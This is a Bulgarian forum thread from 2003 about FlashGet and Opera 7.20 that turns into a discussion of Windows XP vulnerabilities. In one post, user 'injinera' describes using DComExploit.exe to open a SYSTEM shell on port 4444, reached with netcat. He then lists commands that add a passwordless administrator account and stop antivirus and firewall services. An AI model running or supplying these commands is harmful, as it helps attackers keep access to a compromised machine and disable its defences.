FLASHGET & OPERA 7.20

Gadget · 16-10-03, 15:15

Или поне ти така си мислиш

))

**revizoro** · 16-10-03, 18:38

Абе Gadget,

Ясно ми е, че си разбрал IP-то ми- нямаше нужда да го пръскаш...

Пак казвам- нямам нищо важно и никога не ми пречи да се преинсталирам точно за 7 минуте с NORTON GHOST-а, така че- не ме е страх.

Въпросът ми е- като си хванал IP-то ми, можеш ли да човъркаш в компа ми каквото си поискаш?

Как го правите бе, братлета...

**injinera** · 16-10-03, 19:07

- Скъсаха ме на математиката. - каза Чапаев. - Вътрешно го чувствувам, убеден съм, че 0,5 + 0,5 е цял литър, ама не можах да го докажа математически.

===========================================================

Та и аз бях убеден, че Уйндоус XP и IExplorer са редки лайна. Но си мълчах, докато се докаже от самосебе си.

Ето ви само с дата 16.10.2003:

<blockquote id="quote"><font size="1" id="quote"><b id="quote">цитат:</b id="quote"></font id="quote"><table border="0" id="quote"><tr id="quote"><td class="quote" id="quote"><font size="1" id="quote">Удаленное переполнение буфера в Microsoft Windows в обработке HCP протокола (MS03-044)

Переполнение буфера обнаружено в Microsoft Windows в обработке HCP протокола. Удаленный атакующий может выполнить произвольный код на уязвимой системе.

Удаленное переполнение буфера в Messenger Service в Microsoft Windows NT/2000/XP/2003 (MS03-043)

Переполнение буфера обнаружено в Messenger Service в Microsoft Windows. Удаленный атакующий может выполнить произвольный код на уязвимой системе.

Удаленное переполнение буфера в SMTP службе в Microsoft Exchange 5.5/2000 (MS03-046)

Переполнение буфера обнаружено в Microsoft Exchange 5.5/2000 в SMTP службе. Удаленный атакующий может вызвать отказ в обслуживании и выполнить произвольный код на уязвимом сервере (только Microsoft Exchange Server 2000).

Неавторизованная установка ActiveX управления в Microsoft Windows 4.0/2000/XP/2003 (MS03-041)

Уязвимость обнаружена в Microsoft Windows (Internet Explorer). Злонамеренный HTML документ может установить произвольное ActiveX управление.

Переполнение буфера в Windows Troubleshooter ActiveX Control (MS03-042)

Microsoft выпустила исправление, которое устраняет уязвимость в Windows Trouble Shooter ActiveX Control. Злонамеренный HTML документ, типа Web страницы или почтового HTML сообщения, может выполнить произвольный код на уязвимой системе.

Переполнение буфера в функции User32.dll в Microsoft Windows 4.0/2000/XP/2003 (MS03-045)

Уязвимость обнаружена в Microsoft Windows 4.0/2000/XP/2003. Злонамеренный локальный пользователь может поднять свои привилегии.

Межсайтовый скриптинг в Microsoft Exchange (MS03-047)

Уязвимость обнаружена в Microsoft Exchange. Удаленный атакующий может выполнить XSS нападение.

Переполнение буфера в Microsoft Word

Уязвимость обнаружена в Microsoft Word. Злонамеренный пользователь может выполнить произвольный код на уязвимой системе.

</td id="quote"></tr id="quote"></table id="quote"></blockquote id="quote"><font size="2" id="quote"></font id="quote">

Проверката дали кода е произволен съм я правил лично. Качих едно XP на G:\Razni\R\. Въпреки това DComExploit.exe успя да извика CMD.exe със System права и да го закачи на порт 4444, откъдето с Nc.exe команваш както ти е кеф.

Код:

net user injinera /add
net localgroup Administrators injinera /add
net user injinera /passwordreq:no 		;без Парола
net stop "Norton Antivirus Service"
net stop "Panda Antivirus"
net stop "ZoneAlarm"

И т.н.

Още на 11.10.2003 излезе инфо, че и кръпка MS03-39 не спасява. Със 7-10% вероятност се пробиват и кърпените XP-та

Аз ЕксПито и Интернет Иксплорера съм ги поставил на трупчета. Но акъла е различен от някои други работи и не подлежи на набиване.

Gadget · 17-10-03, 00:22

@revizoro: Няма смисъл да те коментирам, нека друг да ти обясни. Аз не съм компетентен, но без да искам съм ти налучкал IP-то

@injinera: Ти все едно преоткри Америка... всяка седмища излиза кръпка за възможно изпълнение на код. Определено M$ в новите си Win версии са наблегнали на стабилността за сметка на сигурността

<hr noshade size="1">

Мисля че, достатъчно се отклонихме от темата. Ако няма какво да кажете повече по въпроса с Flashget + Opera е време да спрете

**ru-boy** · 17-10-03, 14:53

<blockquote id="quote"><font size="1" id="quote"><b id="quote">цитат:</b id="quote"></font id="quote"><table border="0" id="quote"><tr id="quote"><td class="quote" id="quote"><font size="1" id="quote">Абе Gadget,

Ясно ми е, че си разбрал IP-то ми- нямаше нужда да го пръскаш...

Пак казвам- нямам нищо важно и никога не ми пречи да се преинсталирам точно за 7 минуте с NORTON GHOST-а, така че- не ме е страх.

Въпросът ми е- като си хванал IP-то ми, можеш ли да човъркаш в компа ми каквото си поискаш?

Как го правите бе, братлета...

<div align="right">оргинално мнение на revizoro</div id="right">

</td id="quote"></tr id="quote"></table id="quote"></blockquote id="quote"><font size="2" id="quote"></font id="quote">

Айде, аз, ако може, да кажа.

Инспектора ти знае IP-то, защото има админ. права в форума и IP ти се записва в лог. Като ти е хванал IP-то, това не значи, че може да ти "човърка" компютъра. Ако ползваш GFI NSS, ще се учудиш колко информация може да получиш за някого по неговото IP. Разбира се има и съответните защити за противодействие, но не искам да ги обсъждам тук.

Gadget · 17-10-03, 18:05

@ru-boy: Това, че имам админ права не значи, че съм се занимавал да му гледам IP-то. Аз и сега не му го знам. "revizoro" е погледнал сигнатурата ми и от нея си e направил изводи, но не е наясно как работи тя

Затова казвам, че в случая съм некомпетентен

**Kiko** · 17-10-03, 18:17

reviziro: инсталираш си стария flashget plugin за opera 6.xx влизаш в настройките на opera 7.xx и правиш всичко както е на този screenshot. [

]

хаха а за IP-то на revizoro май става въпрос за картинката от сигнатурата на Gadget. [:D]

**revizoro** · 19-10-03, 11:56

Гаджет, не знам дали си некомпетентен, ама аз си го признавам. Наистина не знам как работи сигнатурата ти, но това за IE 6 е абсолютно невярно. IE6 го намирам за пълна пръдня, а използвам OPERA 7, видно от заглавието на темата, по която наистина получих помощ, за което благодаря на всички.

Баси изречението дето стана...

**ru-boy** · 20-10-03, 11:57

<blockquote id="quote"><font size="1" id="quote"><b id="quote">цитат:</b id="quote"></font id="quote"><table border="0" id="quote"><tr id="quote"><td class="quote" id="quote"><font size="1" id="quote">@ru-boy: Това, че имам админ права не значи, че съм се занимавал да му гледам IP-то. Аз и сега не му го знам. "revizoro" е погледнал сигнатурата ми и от нея си e направил изводи, но не е наясно как работи тя

Затова казвам, че в случая съм некомпетентен

<div align="right">оргинално мнение на Gadget</div id="right">

</td id="quote"></tr id="quote"></table id="quote"></blockquote id="quote"><font size="2" id="quote"></font id="quote">

E, аз не предположих, че за това става дума [:I] и се хванах за прекия отговор [

]. А по въпроса с банерчето то е обществено достъпно на съответния адрес и е безплатно. Може да са сменят и животинките, по желание. Има дори и български превод, и показва само собственото IP, а не друго. Забавно е. [

]

-----------

А сега по темата (но не съвсем):

Вчера прочетох в и-нет, че ако си оставиш опцията в ХР-то за сверяване на часа със сървърите на М$, то един път седмично това се случва и се изпраща допълнителна информация свързана с лиценза на уиндоуса, без знанието на потребителя. Това на мен не ми харесва, и е свързано само с ХР-то, може би и следващите версии.

**injinera** · 22-10-03, 00:31

<blockquote id="quote"><font size="1" id="quote"><b id="quote">цитат:</b id="quote"></font id="quote"><table border="0" id="quote"><tr id="quote"><td class="quote" id="quote"><font size="1" id="quote"> ако си оставиш опцията в ХР-то за сверяване на часа със сървърите на М$, то един път седмично това се случва и се изпраща допълнителна информация свързана с лиценза на уиндоуса, без знанието на потребителя.</td id="quote"></tr id="quote"></table id="quote"></blockquote id="quote"><font size="2" id="quote"></font id="quote">

Работите са много по дебели. XP е правн с идеята, че ще слуша първо по мрежата, после потребителя. Бил Гей желае да ни стъпи на врата на всичките.

==============================================

Отварянето на един документ с M$Word XP под XP е процес, зависим от DCOM. ЗАЩО? Този документ мой ли е или обществен?

==============================================

Имайки предвид, как клубовете купиха 98, ЗАКОННА, а после се оказа, че не е и се изръсиха за XP, е очевидно, че Майкрософт са мръсници отвсякъде.

За мен е непонятно как може да дадеш на мръснишкия браузър да се свързва към НЕТА. Само Господ и Бил Гей знаят какво мръснишката ОС приказва за теб през този браузър.

Аз XP-то и IExplorer съм ги вдигнал на трупчета. Вие-както искате.

**ru-boy** · 22-10-03, 09:49

Има една много хубава програма, която буквално ОРЯЗВА IE и другите и функции на ХР-то плюс много други по желание, така, че да може човек да ползва ХР-то спокойно. Програмата е XP Lite. Друго, обаче е по интересно. Монтирах си една програма (кей-логер) 123XPSpy. Опитах да въведа парола с on-screen keyboard и всеки път ми я прехващаше и щом прави това с on-screen keyboard, какво остава за нормалната клавиатура. И това не е всичко. Колкото пъти kill-на процеса на програмата, след 3-4 секунди пак се появява, без това да прекъсва работата на програмата. И какъв е смисъла от защитеното ми виртуално у/во, като всеки ще може да разгледа лога на програмата и да ми види паролата.

FLASHGET & OPERA 7.20

Инструменти на темите